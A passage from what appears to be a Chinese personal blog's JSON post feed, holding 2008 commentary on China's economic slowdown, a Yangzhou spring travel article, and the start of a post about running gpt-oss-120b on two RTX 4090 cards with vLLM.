年的消费会提供额外的惊喜。消费增幅几乎没有可能弥补由于出口和投资下降带来的经济增长放缓的压力。当然，消费增幅也有可能出现意外，那就是由于通货膨胀预期的不断深入，而出现抢购风潮。但是这种行为对于任何经济体几乎都是最糟糕的一种状态。面对经济增长这幅相当黯淡的图景，有哪些应对措施呢？作为坚定的市场主义者，本来我们并不需要对这种经济周期或者经济的自我调整有太多的担忧，在一个正常的经济政治形态下，这种经济周期并没有什么大不了的，经济增长正如四季轮换，温度有高有低，对于大多数民众，适时调整经济行为，总是能挨过去的。不过，阅读本文的读者应该知道，由于长期以来的畸形发展模式，中国的经济政治架构特别脆弱，似乎统治合法性和社会稳定都系于经济持续发展一端，矛盾在社会各个领域的积累已经让整个社会无法经受一次经济危机的自我纠错，因此让经济增幅滑落并不是当政者能接受的政策选项，当政者本能的要为保障经济发展而展开刺激性的政策。当局有什么应对招数呢？理论上，当局可以在投资，出口，和消费三个领域做文章。不过消费（或者说内需）的提升不是一朝一夕之间能做到的，中国政府在这方面的努力起码在表面看来已经进行多年，但是都没有有效的刺激内需。说到底，内需或者消费的提升进而成为经济增长的主要驱动力必须是一项制度变革的系统工程，这对既有决策层是不可能的任务。至于出口增长，一方面和国际市场息息相关，另外一方面中国经济的各种内在隐患，使得当局在推动出口动力方面恐怕有心无力。那么还是要回到投资上做文章。对于一个掌握巨大资源的政府来说，最便利的选项自然是通过增加投资来刺激经济增长。这种选项也符合现有政治结构的特别口味，因为 2008 年地方政府换届刚刚完成，政绩驱动必然转变为雄心勃勃的投资增长计划。中央政府在这方面也不甘落后，在庞大的财政收入支持下，一些大型的投资项目将会纷纷推出。比如已经见诸报端的大飞机工程，京沪高铁等等。一些讨巧的学者又在适时的论证积极财政的必要性和合理性，也许要不了多久，积极财政政策就成为决策层的共识，得以堂而皇之的推展开来。考虑到当下经济政治结构的现实，我们丝毫不怀疑，当积极财政政策这个通道重新被打开后，当局完全可以提交漂亮的经济增长数据。不过可怕的是，从紧的货币政策根本栓不住财政这头巨兽，却扼杀了无数的中小企业的生机，国进民退的悲喜剧以各种方式上演，中国经济体以一种畸形的形态越走越远。问题是，我们的环境，社会现实还能提供同样的承载能力吗？这种权力驱动的经济增长，我们还能忍受多久？在经济发展的这个重要十字路口，执政当局面临重要的选择，但是显然选择并不只有一个，上述选择虽然特别符合执政当局的口味，但是多少有些类似饮鸩止渴，后患不菲，更重要的是这种选择是无法持续的。其实只要执政当局能拥有对经济增长本质一定的认知，对特殊集团利益采取必要的克制和约束，同时展示对公共利益最低的敬意，那么一个更加自然的选择就出现了。这个政策选项，简单的说就是促进经济自由化改革，让经济体迸发自身的活力。市场经济的本质就是自由，改革开放三十年就是经济自由化的三十年，但是又是自由化远未充分展开的三十年，在经济增长前景黯淡的时刻，正是凝聚共识，重新切换到经济自由化轨道的时刻。如能回归到这种经济发展共识，那么一系列推进经济自由的政策窗口将自然开启。比如当局可以通过大幅度的降税计划来刺激微观经济体的投资和消费行为，这种做法将远比政府主导的投资行为更有效率，更具可持续性。比如当局可以通过推动必要的法律变革，使得更多的要素可以市场化，在交易中创造财富和价值。仅仅土地，金融等这几个领域的市场化改革，就能提供相当长一段时间内经济增长的动力和空间。当局也可以打破行政垄断，把国资委和它名下的 100 多家巨无霸企业进行市场化改制，引入充分的竞争。 因为这些通过权力依附在经济体内的特殊利益集团本身已经成为毒瘤，吸收无数资源，毁坏市场价值。打破这种垄断，将让中国的经济增长更具备普惠性和公正性。只有采取这种激活经济体内部活力，破除经济发展障碍的政策，中国的经济前景才能拨开云雾，重见蓝天。在金融体系日益全球化时代，这种政策选项变得尤其紧迫。中国经济已经深刻的融入全球化进程，全球流动性过剩与中国的资产泡沫和经济过热息息相关，中国经济周期和全球经济体的周期已经呈现某种共振现象，只不过由于资本管制等原因，这个共振有个时差。这个共振可能是逆向的，比如全球流动性紧缩的时候，中国的流动性反而过剩，那是因为中国成为资本套利的最佳场所。而反过来，当全球经济体系恢复元气，尤其是美国经济体开始恢复的时候，资本开始外流，这时候对中国经济的真正考验就开始了。正如巴菲特的那句名言，只有当潮水退去后，才知道谁在裸泳。如果上述经济自由化政策得不到落实，经济活力得不到有效的培育，那么意味着这些年的流动性过剩并没有增加中国经济体的内生能力，经济增长在低水平重复。在货币流动性汹涌的时候，我们看到经济过热，人民币升值，但是潮水退去后，我们看到的就是人民币贬值，经济萧条。当这种场景和中国既有的社会危机相结合的时候，执政当局恐怕再也无力回天，他们寄望甚多的社会稳定和绩效合法性也将被雨打风吹去。……………………到了今年，胡温公开表示，中国经济可能是 1949 年以来最为困难的年份。中国经济怎么了？老周发来相关内容。zhoujd2008 年 6 月 17 日 21:47供参考中国经济.doc中国经济 “拐点灾难性” 论断并非危言耸听余丰慧国家统计局副局长许宪春在上海接受《中国经济周刊》采访时明确表示：“中国经济可能已经进入调整周期，未来几年，我国经济增长速度将呈现出逐步回落的过程。”（6 月 10 日《中国经济周刊》）。在经济学中，经济发展速度增长的峰值和谷值通常被称为 “拐点”。而当经济出现 “逐步回落的过程” 即可认定为经济出现了向下 “拐点”。经济学家梁小民在上海举行的某论坛上指出，中国经济在近一、两年内出现拐点难以避免，短期内后果 “或许是灾难性的”，但是从长期看，这个 “阵痛” 将使中国经济的发展更健康。对于梁小民 “拐点灾难性” 的论断，多位经济学家表示，目前 CPI 的持续高位相当让人忧虑，如果当经济回落发生时通胀仍处高位的话，许多经济发展中的内在矛盾就会暴露出来。言外之意是，梁小民 “拐点灾难性” 的论断或许并非完全是 “危言耸听”（出处同上）。中国经济最怕出现的现象是，在通货膨胀处于高位时，经济出现大落，经济 “拐点” 过猛。而当前，我国通货膨胀在连续四个月处于高位阶段，五月份虽然可能有所回落，但是，总体来看一个时期高物价局面很难改变。仅从国际油价、粮价、资源价格不断攀升就可略见一斑。在这种情况下，如果我国经济增长速度再出现大的滑落，无疑是雪上加霜。然而我国经济出现大落或者说拐点过猛的可能性不是没有。从世界经济看，美国次级抵押贷款债券危机，已经导致美国出现了经济减速和金融动荡，直接使其消费大幅下降，对中国商品需求减少，使中国许多出口企业经营困难。国际石油、粮食和资源以及原材料涨价不但助推了中国内地通货膨胀，而且加大了许多中国企业的生产成本，导致经营困难。从国内情况看，人民币的大幅升值已经导致沿海一些出口企业面临停产、破产的边沿，例如：广东的东莞许多工人已经失业。同时，随着环境成本加大、对劳动者各种保障的落实以及劳动力成本的上涨等，也使得一些出口企业面临相当困难。出口在拉动我国经济中是一支重要力量。这种内外夹击现象，已经使得这驾马车开始大幅减速。我国消费从根本上说一直没有启动起来。如果出口拉动下来了，而消费又没有启动起来，那么，我国经济肯定出现大幅滑落。另一个值得关注的焦点是，我国经济中许多矛盾都在憋着奥运会这个 “时间点”。经济中许多价格问题需要理顺，但因为奥运会推迟了；房价过度炒作奥运会概念，奥运会结束后，这个预期将被消除；甚至股市大家都预期奥运会前不会有大的下跌。随着奥运会临近和结束后，种种奥运会经济预期都将终结，过去过分炒作奥运会经济概念可能要付出楼市下跌、股市下滑，导致整个经济大落的代价。不排除奥运会后许多矛盾一并暴露出来的情况。如果经济高速增长中伴随着通货膨胀，这种现象并不可怕。因为，随着经济高速增长，国民就业充分，收入增加，抵御通货膨胀的能力较强。最为可怕的是，一边经济下滑，另一边通货膨胀加剧。这将导致国民就业岗位减少，收入下降，却要面对着高物价，很可能使一些低收入者面临生活生存困难。而当前我国经济很可能出现这种情况。因此，必须防止我国经济出现 “拐点” 过猛和奥运会后大幅下降的情况。中国 13 亿人口，要吃饭、要生存、要就业，要不断提高生活水平和质量，必须要有一个可观的经济增长速度来支撑。否则，对 13 亿中国人来说，将是灾难性的。当务之急是人民币决不能升值过快，汇率变动必须考虑到中国经济的承受能力。要按照胡锦涛总书记所指出的，密切关注国内外经济形势的变化，正确把握宏观调控的节奏、重点和力度。货币政策在从紧的大前提下，应该适时、适度灵活应变。特别是在防通货膨胀和保经济增长上，宏观调控要显示出高超智慧。抓住经济调整的机会，继续加大对农业的投入，促进农业大发展，启动潜力巨大的农村消费市场，拉动经济增长。国家统计局副局长：我国经济增速将逐步回落2008 年 06 月 10 日 　来源：人民网－《中国经济周刊》5 月 29 日，国家统计局公布的宏观经济预警监测结果显示，4 月份，我国宏观经济景气预警指数为 110.7，低于上月的 113.3，连续第 4 个月处于代表稳定状态的 “绿灯区”。2007 年 9 月之后，我国上述宏观经济景气预警指数曾连续 4 个月处于 “黄灯区”。四个 “黄灯” 之后的四个 “绿灯”，是不是意味着宏观经济已经排除 “由偏向转为过热” 的风险？5 月 28 日，国家统计局副局长许宪春在上海接受《中国经济周刊》采访时明确表示：“中国经济可能已经进入调整周期，未来几年，我国经济增长速度将呈现出逐步回落的过程。”经济增速出现向下 “拐点”在经济学中，经济发展速度增长的峰值和谷值通常被称为 “拐点”，在判断是否出现 “拐点” 时需排除两种情况：即正常的经济增长波动和经济增长大起大落。而当经济出现 “逐步回落的过程” 即可认定为经济出现了向下 “拐点”。近年来，有关中国经济是否将出现 “拐点” 的争论在学界从未停休。自上世纪 90 年代年以来，许宪春长期担任国家统计局国民经济核算司负责人，而该司的主要职能是对国民生产总值 (GDP) 等反映国民经济的重要数据进行核算。“我们初步判断，2007 年可能是此轮高速经济增长的峰值，今年后，经济增长速度会逐步回落。” 许宪春进一步分析说，“从世界 GDP 数据来看，经济能够连续保持 5 年以上两位数高增长的国家和地区还是非常罕见的，我们目前只发现日本、新加坡和香港曾经有这样的记录。” 其中，1966 年到 1970 年，日本保持过连续五年的增长；1961 年到 1965 年，香港也连续保持五年的两位数增长。许宪春认为，中国经济发展也不能脱离世界性的规律，“中国在 1992 年到 1996 年曾经保持过连续 5 年的两位数增长，属于一个经济周期中的向上周期，年均增长 12.4%，而此轮经济周期从 2003 年到 2007 年又是第二次连续五年的两位数增长，年均增长 12.8%，但这样的高速增长是不能长时间持续的，必然会在出现峰值之后有个逐步回落的过程。”记者注意到，近期一些国际组织和预测机构对 2008 年中国经济增长的预测，也似乎旁证了 2007 年中国经济处于峰值的观点。世界银行预测今年中国 GDP 增长 9.6%，国际货币基金组织预测增长 9.3%，亚太经合组织预测增长 10.7%，亚洲银行预测增长 10%。许宪春认为，国际组织和预测机构对我国今年经济增长的预测结果都低于我国去年 GDP 11.9% 的增长率，从另一个角度说明了 2007 年很可能是这轮经济增长的峰值。“拐点” 后高通胀仍将持续5 月 29 日，经济学家梁小民在上海举行的某论坛上指出，中国经济在近一、两年内出现拐点难以避免，短期内后果 “或许是灾难性的”，但是从长期看，这个 “阵痛” 将使中国经济的发展更健康。在许宪春看来，此次经济增长进入下降周期应该可以避免 “大落”。“从上世纪 90 年代到目前，我国经济运行出现了两个周期。第一轮经济周期是 1990 年到 1999 年，1996 年出现波峰后，1999 年回到经济增长 7.6% 的波谷值。第二轮周期是 1999 年开始的，2003 年到 2007 年连续五年的增长使 2007 年 GDP 增长处于 11.9% 的峰值，” 他表示，“虽然此轮周期没有结束，但可以判断的是，其与上轮周期经济波动存在一些不同，主要体现在此轮周期波动应该会小于上轮周期。如果不出意外的话，此轮周期的下降期能够回到新的波谷，但我们认为新的波谷也不会太低。所以此轮周期波动应该是一个慢起步、匀加速、缓减速、稳着陆的态势。”不过，梁小民 “拐点灾难性” 的论断或许并非完全是 “危言耸听”，在记者的采访中，多位经济学家表示，目前 CPI 的持续高位相当让人忧虑，如果当经济回落发生时通胀仍处高位的话，许多经济发展中的内在矛盾就会暴露出来。许宪春的分析似乎印证了这一点。他向《中国经济周刊》表示：“从物价来看，近年的第一轮周期峰值是 1994 年的 24.1%，谷值是 1999 年的 - 1.4%，相差 25 个百分点。而此轮周期峰谷值之间只相差 6.2 个百分点，因此通过对 CPI 和 GDP 增长率的综合比较，我们判断，此轮经济周期中，物价增长的峰值比经济增长的峰值会滞后两年，也就是通胀峰值会在 2009 年出现。”5 月初，中国人民大学国民经济管理系主任刘瑞在接受媒体采访时曾表示：“其实早在去年第 4 季度开始，中国经济就已出现‘拐点’。要防通胀，理论上说，未来中国经济增速不应超过合理增长率 9%。”“今年通胀形势已经十分严峻，原来预计到第二季度会逐步回落，但是现在来看，这个回落期要往后推迟，特别是四川地震之后，可能进一步延缓价格回落的时间。” 许宪春对今年的通胀形势亦不乐观，“目前，通胀问题必须引起我们的高度重视，因为如果一、两年后物价到达峰值，那么届时将会给经济造成巨大压力。”防 “大落”，紧缩政策需调整“胡锦涛总书记曾指出，要密切关注国内外经济形势的变化，正确把握宏观调控的节奏、重点和力度。这为下一阶段的宏观调控指明了方向。” 许宪春说。近期国际组织和预测机构对今年的世界经济形势也做出了预测。国际货币基金组织认为 2008 年世界经济将增长 2.6%，比 2007 年回落 1.1%；英国经济学家智库 (EIU) 则预测今年世界经济增长率为 2.6%，回落 1%；亚太经合组织预测世界经济增长率为 2.1%。目前，中国经济正在承受来自全球的不利因素影响：一方面，世界通胀的形势严峻，据世界银行统计，全球通胀率已经从 1 月的 3.9% 上升到 3 月的 4.1%，其中发展中国家从 7.6% 上升到 8.4%；另一方面，世界贸易增长率将出现明显的回落，今年 4 月世贸组织发表报告称，2008 年世界贸易发展面对诸多不确定因素的挑战，世界贸易增长率将出现大幅度回落，今年世界贸易增长率将从去年的 5.5% 下降到 4.5%，下滑已经成为定局。许宪春认为，这些国际诸多复杂因素，加大了宏观调控的难度。“目前有‘两个避免’非常需要关注，” 他表示，“第一个要避免政策性紧缩、美国次贷危机的影响和经济发展自身规律形成的自然减速的叠加，造成经济增长速度过快回落；第二个要避免连续五年的两位数高速增长对价格的滞后影响。”一位宏观经济分析专家向《中国经济周刊》表示，在 “第一个避免” 中的三大因素中，次贷危机属于国际环境，而经济周期属于客观规律很难改变，如果这两个因素比预想的要严重，那么只有调整政策性紧缩才可能防止经济增长速度过快回落。(谈佳隆)……………………去年，我写了 “咱单个省份就富可敌国与咱们实在毫无干系” 的文字。在美国的中国学者给我发来了读后感。PANG Zhongying2007 年 11 月 17 日 19:35回复： 潘祎的稿子感谢您的清醒的尖锐的批评报道。感谢经常惠寄大作！“中国经济” 已经是个过时的术语了。不存在 “中国的” 经济。外国公司控制下的经济而已！那些恬不知耻的人或者不明真相，或者难以理解，或者不会表达的人，以为这是 “咱们”“中国的” 经济。天啊！最大的失败，最大的灾难正是经济的失败和经济的灾难。还以为 “大国崛起” 呢！全民和全国都是亚洲和美国、欧洲的廉价 “苦力” 供应者，世界环境成本的最大承受者，却以为自己是 “崛起” 的新兴大国了。梦或者做梦，还算可爱。即使是无知，或者天真，都可以理解。但，生活在乌烟瘴气 —— 西北风都不干净的千万人口的超级苦力聚集地（如今那一个个 “房” 价昂贵的超级大城市），说是正在走向 “大国崛起”，是否太一相情愿或者简直是痴人说梦？庞中英于美国访问中……………………庞中英最近还给我发来了有关中日在东海问题上的内容。在此向他、以及所有给我提供参考材料者表示感谢。我感觉，庞中英的评论应该是一语中的。当然，像郑永年、俞可平、王沪宁、郑新立等等，都在说中国的政治体制改革慢于经济体制改革，这才导致了中国经济出了问题。本来嘛，经济体制改革成为显学，而政治体制则是舆论禁区。中国的改革原本就是采取先易后难的路径。这种制度选择本身看上去好像符合现实，但却是中国的官僚体系的特色，那就是甩包袱的击鼓传花方式，把麻烦留给继任者。最难啃的骨头让接班人去干。中国对 GDP 的崇拜和对 GNP 别有用心的束之高阁，就可以看到委府发展的基本思路。如上所示，中国经济本身就是千疮百孔。或者说，根本不存在所谓 “中国经济” 这个概念，在主权国家的幻象当中，以海关为统计边界，号称与时俱进的当权者，在虚拟经济以及信息化如此甚嚣尘上的时代，竟然还满足于以国境线为考量经济的界尺，完全把中国国民的利益抛到九霄云外。麻烦的是，中国用如此体制与机制下的经济高速发展，向全人类展示出来的强取豪夺也可以 “国泰民安”，特别是国民 “安贫乐道” 的虚假景象，正在对全世界形成着经济威胁的同时，更是把全人类的道德水准以及治理方式向着人类底线突飞猛进。全人类目瞪口呆地看到，一个无法无天甚至无恶不作的经济体，却成为了世界经济的顶梁柱和火车头，成为了人类发展的标杆。如此下去，那当然就不是什么国将不国的事情，而是人类面临着的巨大困境以及增长的极限。所以，中国官方媒体能够援引美国鬼子有关中国经济如果出现衰退会对全世界的影响，却对中国经济背后的价值观溢价效应闭口不谈。这种现象，是不是很耐人寻味？" },{ "title": "被评为世界No.1，中国最安逸的城市，它排第二，没谁敢称第一", "category": "", "tags": "misc1, misc2, misc3, misc4", "url": "/2026/04/02/yz.html", "date": "2026/04/02", "content": "有人说，</p><p></p><p style=\"background-color: white; color: #2b2b2b; font-family: PingFangSC-Regular, "Pingfang SC", "Hiragino Sans GB", "Noto Sans", "Microsoft YaHei", simsun, arial, helvetica, clean, sans-serif; font-size: 16px; line-height: 32px; margin: 0px 0px 20px; padding: 0px; text-align: justify; text-indent: 28px;\">春天，一定要留一个篇章给扬州。</p><p style=\"background-color: white; color: #2b2b2b; font-family: PingFangSC-Regular, "Pingfang SC", "Hiragino Sans GB", "Noto Sans", "Microsoft YaHei", simsun, arial, helvetica, clean, sans-serif; font-size: 16px; line-height: 32px; margin: 0px 0px 20px; padding: 0px; text-align: justify; text-indent: 28px;\">春天，总要下一次江南啊。</p><p style=\"background-color: white; color: #2b2b2b; font-family: PingFangSC-Regular, "Pingfang SC", "Hiragino Sans GB", "Noto Sans", "Microsoft YaHei", simsun, arial, helvetica, clean, sans-serif; font-size: 16px; line-height: 32px; margin: 0px 0px 20px; padding: 0px; text-align: justify; text-indent: 28px;\">如果说，中国最美的春天在江南。</p><p style=\"background-color: white; color: #2b2b2b; font-family: PingFangSC-Regular, "Pingfang SC", "Hiragino Sans GB", "Noto Sans", "Microsoft YaHei", simsun, arial, helvetica, clean, sans-serif; font-size: 16px; line-height: 32px; margin: 0px 0px 20px; padding: 0px; text-align: justify; text-indent: 28px;\">那么，江南最美的春天，必定在扬州。</p><p style=\"background-color: white; color: #2b2b2b; font-family: PingFangSC-Regular, "Pingfang SC", "Hiragino Sans GB", "Noto Sans", "Microsoft YaHei", simsun, arial, helvetica, clean, sans-serif; font-size: 16px; line-height: 32px; margin: 0px 0px 20px; padding: 0px; text-align: justify; text-indent: 28px;\"></p><p style=\"background-color: white; color: #2b2b2b; font-family: PingFangSC-Regular, "Pingfang SC", "Hiragino Sans GB", "Noto Sans", "Microsoft YaHei", simsun, arial, helvetica, clean, sans-serif; font-size: 16px; line-height: 32px; margin: 0px 0px 20px; padding: 0px; text-align: justify; text-indent: 28px;\">一句 “烟花三月下扬州”，那时起，扬州就和春日紧紧地绑定在一起。</p>很多人不知道，地处江北的扬州，但却被人誉为“最后的江南”。01扬州・生动诗意的春韵春天，无疑是扬州最诗意、也是最热闹的季节。袅袅青烟与丝丝细雨缱绻缠绵，山水园林，亭台楼榭的诗意，合并成这幅上了淡淡色彩的水墨画。蛰伏了一整个冬天的扬州，终于重新起笔，撰写新一年的诗词。石板小路，青石街巷、柳条垂钓、薄雾清风，诗中的对扬州的描述，在春天都有了更形象的展示。另外 “闹” 这个字眼，看似和诗意冲突，其实却不然。因为，这个 “闹” 只是相对而言，春天的百花齐放，算是斯文儒雅到骨子里的扬州最主动展示自己的时候。撒了一地浪漫的二月兰；圣洁典雅的玉兰花；落英缤纷的樱花；芬芳扑鼻的梅花；花美名更美的琼花还是扬州的市花；就在所有地方都开心地说：“春天终于来了！”唯有扬州，叹一句：“此时正是烟花三月。”02扬州・“窗” 中的盛景来过扬州的，一定明白，赏诗意扬州的隐藏视角。那便是，“窗” 中的扬州。园林里，街头上，走廊的墙上，总能看到刻意又无意留下的 “窗”。将院中的景致，框出一个别致的画框，构图是怎样就要靠自己的眼睛。这无疑是构成东方美学的中式建筑的重要一笔。宠辱不惊，看庭前花开花落。去留无意，望天上云卷云舒。节制里藏优雅，气韵中显格局。你根本不需要懂建筑，只需一眼，就会无可救药地爱上扬州的窗和窗中的扬州。也正是来了扬州，才能明白，为什么说中国人的房子有一种几千年凝练下来的美。03扬州・比苏杭更秀美春天来扬州，一定要来瘦西湖。瘦西湖和杭州的西湖，一字相差，但气质可谓是大不相同。瘦西湖是一条狭长的河流，湖面时宽时窄，所以景致也是不断地变换的。也因为她比杭州西湖更具一分清瘦神韵，而由此得名。来到一个不同的城市，总会有一瞬间有种 “原来这就是传说中的...” 的感觉。看到薄雾作纱，遮住自己娇容瘦西湖，山水与草木仿佛是她身上的饰品，这一刻，方才真切的感受，自己来到了扬州。奈何这种美艳怎能藏得住，在艳阳直射当头的正午，这个姑娘便淡然接受所有人投来的赞许目光。怎么形容呢？简直是判若两湖吧。泛舟在缠绵的湖水之上，穿梭在花团锦簇的万花园中，游走在游人如织的岸边，有种粘稠又推拉的情愫，好像总是罩在这方天地。到了傍晚时分，这种情绪到了顶点。想起杜牧那首诗：“青山隐隐水迢迢，秋尽江南草未凋，二十四桥明月夜，玉人何处教吹箫。”想必，乾隆皇帝当年就沉醉在这种逍遥里无法自拔吧。即便千百年时光而过，也没能将瘦西湖这份情愫耗尽。前有多少慕名前来的文人墨客，后就有多少远赴而来的摄影爱好者。他们都有一个共同目的，就是把瘦西湖 “刻画” 下来。春天来扬州，一定要来个园。这座清代扬州盐商宅邸私家园林，因为主人生性好竹子；而竹叶三片形似 “个” 字，便取得这个名字。而走进个园，也就有了答案，抬头一看，有些阴沉的天空和片片竹叶，可不就像宣纸上灵动的那些 “个” 字。继续往里走，中间的花园便是整个园林造景最有意思的部分。错落有致的水池被假山灵巧地分隔开，周围各种造型奇特到让人眼花缭乱的太湖石。不足五十亩的园子，开辟了春、夏、秋、冬四个形态逼真的假山区，是中国园林的孤本。沿着青石铺就的小路，透过轻巧玲珑的洞门，园内的雅致映入眼中。东中西三个院落，被狭长的小巷贯穿，行走其中，两眼是看不完的景。整个园子倒是很有江南烟雨的美感。春天来扬州，一定要来何园。同个园一样，这也是一座私家园林。由何芷舠于清光绪年间建造，晚清园林建筑代表作，被称为晚清第一园。串起整个园林的是一条长 1500 米的复道回廊。左右分流、高低勾搭、衔山环水、登堂入室，一路走下来有一种在走立体迷宫的感觉。与晴天相比，落雨时候，反倒更具韵味。要知道，瓦是喜欢雨的。串串雨珠落在瓦上，总像是在弹琴一般，轻巧灵动。在湿润的回廊徘徊，满眼的幽静和甜美。所有的一切舒缓着浑身每一个细胞，让人醉在这幅画里。04扬州・香火绵延春天来扬州，一定要来大明寺。作为一个寺院而言，大明寺真的很美。小桥流水，鸟语花香，一应俱全。园林寺的布置，为寺庙增添了些许幽静。而寺内给人印象最深的应该是栖灵塔了。在去大明寺的路上和瘦西湖里，远远的都能看到它高耸的身影。登上栖灵塔顶，可以尽揽扬州风光，很推荐登顶看一看。春天来扬州，一定要来观音山。观音山在瘦西湖的北边，比起其西边不远处的大明寺，要静谧不少。来观音山拜佛的主要以当地人为主。两侧的黄色矮墙边，总有探出头的绿意，这种色差感也很是和谐。同时，这里还是扬州的自然制高点，远眺江淮南北，一览无余，在这里远眺，身心特别舒畅。作为一座小而精致又富特色的山间禅寺。从进门上山到石香台观音殿，再到下山出门，似乎都恰到好处得被巧妙构建在一起。05扬州・清新与古朴并存春天来扬州，一定要来鉴真图书馆。作为国内第一家佛教图书馆。尤其是春天，这里绝对值得一去，图书馆后面是个茶园，在这里看书称得上是种别样的人生享受。其次，四月迎来了樱花季。在馆外，有一条樱花大道。那一树的粉装，娇而不羞，像成熟而又典雅的女子，仰头看着一片片随风飘落的花瓣，纷纷扬扬的飘落在行人的肩上，头上，草丛间，小路上。春天来扬州，一定要来扬州大学。(扬州大学历史悠久。学校前身是 1902 年由近代著名实业家、教育家张謇先生创办的通州师范学校和通海农学堂。https://baike.baidu.com/item/%E6%89%AC%E5%B7%9E%E5%A4%A7%E5%AD%A6）扬州大学有七个校区，分别有着不同的优美风景。在扬州大学校内走走逛逛，有几分厦大的同感。细细观察，校园里有很多小确幸。路边时不时就能看到公益箱，被喂食的小猫，餐盒总是装得满满的，这种校园里的纯真善良真的很美好。春天来扬州，一定要来东关街。东关街是古扬州的水陆交通要道，街头就是古运河码头所在。而今，岁月流逝，这里成为扬州城里最具有代表性的一条历史老街。你可以漫无目的的在一条条小巷中走走停停。主道人来人往，转到一条小巷就像来到截然不同的世界，静谧又有时间的做旧感。值得一提的是，东关街中段有一棵楝树，春天楝树开花，沁人的香气走了很远都还能闻到。春天来扬州，一定要来南河下。南河下片区和此前的 “双东” 片区一样，是老扬州耳熟能详的地方。小巷深宅中，古宅遗迹俯拾皆是，老井、砖雕门楼、古树随处可见。这里的老街区道路很窄，但是扑面而来的生活的气息也是一种特色。小街小巷，干净悠闲，少许破落，转角却可能有无比精致的私家园林藏身。06比成都慵懒比老广会享受扬州生活节奏慢，最明显的就体现在“吃”上。其他地方的人，早饭吃得匆忙，对付几口就罢，而扬州单是吃早茶，就要从一大早吃到中午头。相约几人一起去茶楼，一杯酽茶、一屉包子，点一个小菜，能唠上许久。“早上皮包水，晚上水包皮”是扬州人的人生信条。意思就是早上吃汤包，晚上去泡澡，把小日子安排得妥妥当当。在吃上，他们可谓是拿出了绝对用心的研究。当年康熙、乾隆皇帝，将淮扬菜水平带到了极高的高度，堪称人间至味。而今，作为被联合国评选为「世界美食之都」之一，你以为就单靠一碗扬州炒饭吗？扬州人讲究早茶文化，茶，肴，干丝，面条，包子（淮扬细点），样样都是门学问。说起来朴实无华， 但你要展开了说，这里面可细了去了。朴实无华又特别好吃的扬州炒饭 桌桌必点的一定有这道烫干丝 ☟一碗饺面感受碳水带来的幸福感 ☟蟹黄汤包，先喝汤, 包更香 香上加香，鲜了又鲜的蟹粉狮子头 ☟入口即化的文思豆腐就像是一个艺术品 ☟软烂入味的 老鹅 香味是层层递进的 ☟不得不说，生活在扬州可太幸福了，他们在追求高品质精神生活的同时，也没忘留有足够的时间品足人间美味。如果你也想感受，城市的惬意，但又不能吃辣。选料鲜活，刀工精湛，火候讲究，清淡雅致的淮扬菜一定要尝尝。有人说，扬州作为一个城市来说，还是不算繁华。没错，扬州作为一个三线小城，生活节奏不快，工资水平在三线城市中等，一辆电动车在主城区半天就可以兜个遍，夜生活也不算太丰富......但还是有无数人愿意来到这里，留在这里。流光溢彩，是中国的城市。月光如水，亦是中国的城市。如果所有城市都成为一个模子的 “批量生产” 还有什么意思呢？扬州，可能跟繁华沾不上边，但是它的代表词从来不少。城在园中，园在城中。扬州不像一个城市，更像是一个大花园，春天更甚。腰缠十万贯，骑鹤上扬州。从古至今，这片清雅恬淡的水墨之地，一直未失宠。如果你厌倦现在的生活，不如就来扬州小住几日。行在诗词里，活在烟火里。不由得感慨，人生啊，真的值得！from https://travel.ifeng.com/c/8F2WKlxRB0V" },{ "title": "战马", "category": "", "tags": "misc1, misc2, misc3, misc4", "url": "/2026/04/01/fh.html", "date": "2026/04/01", "content": "" },{ "title": "近期LLM的部署与应用经历(3)", "category": "", "tags": "AI, LLM, 模型部署, 使用体验", "url": "/2026/03/01/llm3.html", "date": "2026/03/01", "content": "用更多的方式探索AI！起因在一年前，我整了张RTX4090 48GiB魔改版用来跑DeepSeek-R1 70B的4bit量化模型，不过都已经过了这么长时间，这个模型也已经是过时的东西了……我之前在Mac Studio M3 Ultra上试了一下OpenAI在半年前出的gpt-oss-120b模型，感觉效果还挺不错，只不过因为M3 Ultra的GPU实际性能比不上正经高端的独显，所以它在上下文很长的情况下还是有点慢，因此我又整了张RTX4090 48GiB，想整个双路试试更快的GPT-OSS模型，总共96GiB的显存应该够跑这个模型了。在两张RTX4090 48G上运行GPT-OSS既然现在我手头有两张4090了，那继续用i5-8400处理器的主机似乎不太合适，主要是那个主板就一个PCIe插槽，想插两张显卡也做不到，那买个新的不知道买啥……不管怎么说既然用这么高级的显卡，至少得让它跑满。在两张显卡上跑模型似乎卡间的通信速度比较重要，那最起码得整个支持2个PCIe4.0 x16的板U套装才行，这种级别的没有消费级产品，只能考虑服务器或工作站了。不过我对服务器和工作站了解得并不多，所以就问了问AI哪个支持2个PCIe4.0 x16的平台最便宜，结果AI推荐了TRX40+TR 3960X，于是就按照AI的说法整了一套。   这套板U差不多4000CNY，价格倒是还行，如果买现役的估计主板都比显卡贵了。但后来我发现这个并不是最便宜的😂，搜了一下买寨版+EPYC 7502还能再便宜1000CNY，而且通道数更多，插4张显卡都没问题……不过买都买了，就先用吧，看来AI的话不能随便信😥。   之前我跑模型为了方便，基本上都用的是Ollama，不过听说Ollama多卡运行的效率很低，而且多并发的效果不太好，所以这次换了新电脑之后我想试试vLLM，据说一般生产级的AI都用的是这个框架。   安装vLLM倒是比想象得简单很多，直接一句pip install vllm就可以了，其实并没有比Ollama复杂多少。我看了一下OpenAI和vLLM运行GPT-OSS的官方文档，发现启动也非常简单，一般来说直接执行vllm serve openai/gpt-oss-120b就可以。不过直接执行是对于单卡的，我用两张卡需要加个--tensor-parallel-size 2参数启用张量并行，不然会爆显存。另外考虑到这个模型本身占掉60多GiB的显存之后剩下30GiB还是看起来有点少，所以额外加了个--kv-cache-dtype fp8参数降低上下文对显存的占用，毕竟模型本身也就是4bit量化的，加了这个应该不会对它的能力有什么影响。除此之外AI还给我推荐了个--enable-chunked-prefill参数，说是也能避免爆显存的问题。   一切准备好之后直接执行，程序就自动开始下载模型了，过了几个小时，终于下载完成，顺便一说启动的时候还显示推荐安装torch_c_dlpack_ext库，虽然不知道是干啥的，但也顺手安装了。启动完成之后我试了一下，效果非常好，不并发的情况下直接用能达到接近190Tps，可以说是相当快了，而且这个模型的水平也算是开源中的上游水平，应该算是又快又好吧……看来多来一张4090还是挺划算嘛。只不过这个东西基本上就我一个人用，所以也没什么能测一下并发的场景……虽然很快，但还是有点浪费性能吧。最近DeepSeek 